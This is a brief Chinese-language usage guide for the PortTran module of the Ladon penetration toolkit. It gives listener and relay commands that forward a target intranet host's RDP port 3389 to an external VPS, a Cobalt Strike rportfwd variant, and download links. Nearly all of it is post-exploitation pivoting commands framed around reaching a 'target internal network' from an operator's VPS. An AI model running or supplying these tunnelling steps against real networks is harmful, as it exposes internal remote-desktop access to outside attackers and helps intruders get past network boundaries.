版本

Ladon >=7.8

PortTran

.NET端口转发工具,支持任意权限。
https://github.com/k8gege/PortTran

外网VPS监听

PortTranS.exe 8000 338

目标内网转发

PortTranC.exe 192.168.85.169 3389 192.168.85.142 8000

VPS连接3389

mstsc /console /v:127.0.0.1:338

自己连接3389

反向转发到VPS后，我们自己的机器连接VPS监听端口即为目标对应端口，如访问VPS的338端口对应1.30的3389端口

如：mstsc /console /v:这里填写VPS的IP即可:338

Ladon命令

Usage:
Ladon PortTran TranPort ConnPort
Ladon PortTran TragetIP TargetPort VpsIP TranPort
Example:
Listen: Ladon PortTran 8000 338
Tran: Ladon PortTran 192.168.1.30 3389 192.168.1.8 8000
Test: mstsc 192.168.1.8 338

Cobalt Strike

转发到本机
rportfwd 389 192.168.1.30 3389
转发到VPS
Ladon PortTran 192.168.1.30 3389 192.168.1.8 8000

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
7.0版本：http://k8gege.org/Download
7.8版本：K8小密圈